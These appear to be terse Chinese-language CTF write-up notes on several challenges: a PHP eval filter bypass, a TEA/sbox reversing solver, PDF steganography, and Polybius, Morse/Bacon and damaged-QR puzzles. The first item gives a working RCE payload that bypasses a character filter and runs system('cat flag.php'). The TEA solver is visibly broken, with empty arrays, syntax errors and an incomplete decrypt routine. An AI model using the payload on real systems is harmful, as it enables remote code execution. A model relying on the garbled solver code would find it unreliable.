1
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);构造数组+rce
?c=eval(array_pop(next(get_defined_vars())));
post传参:a=system("cat flag.php");
2
sbox+2*tea
from ctypes import *
def decrypt(v,k):
v0=c_uint32(v[0])
v1=c_uint32(v[1])
delta=0x12345678
sum1=c_uint32(delta*32)
for i in range(32):
#print(v0.value,v1.value)
v1.value-=((v0.value <<4)+k[2])^(v0.value+sum1.value)^((v0.value >>5)+k[3])
return v0.value
//enc
v1.value
enc=[
]
//sbox
import random
random.seed(1337)
xixi=[random.randint(0,0xffffffff) for i in range(4)]
sbox=[
]
random.seed(7331)
haha=[random.randint(0,0xffffffff) for i in range(4)]
for i in range(0,8,2):
tmp=enc[i,i+2]
enc[i.i+2]=decrypt(tmp,xixi)
from struct import pack
flag=[]
for i in range(8):
flag+=list(pack("<I",enc[i]))
result=[0]*len(flag)
for i in range(len(flag)):
result[sbox[i]]=flag[i]
print(bytes(result))3stegano(pdf隐写)
复制该PDF文件,将它用记事本打开
然后出现一串AB(非5倍数)莫斯解码
4polybius checkerboard
波利比奥斯棋盘。3534315412244543_434145114215_132435231542
棋盘密码在线加密解密 - 千千秀字
5.1不仅仅是Morse
莫斯解码,对一串ba进行培根解密
5.2 损坏的二维码
二维码本身具有纠错能力,损坏不多补上定位块就可以扫
扫二维码进行重定向了:F12选择网络就可以看到重定向前的响应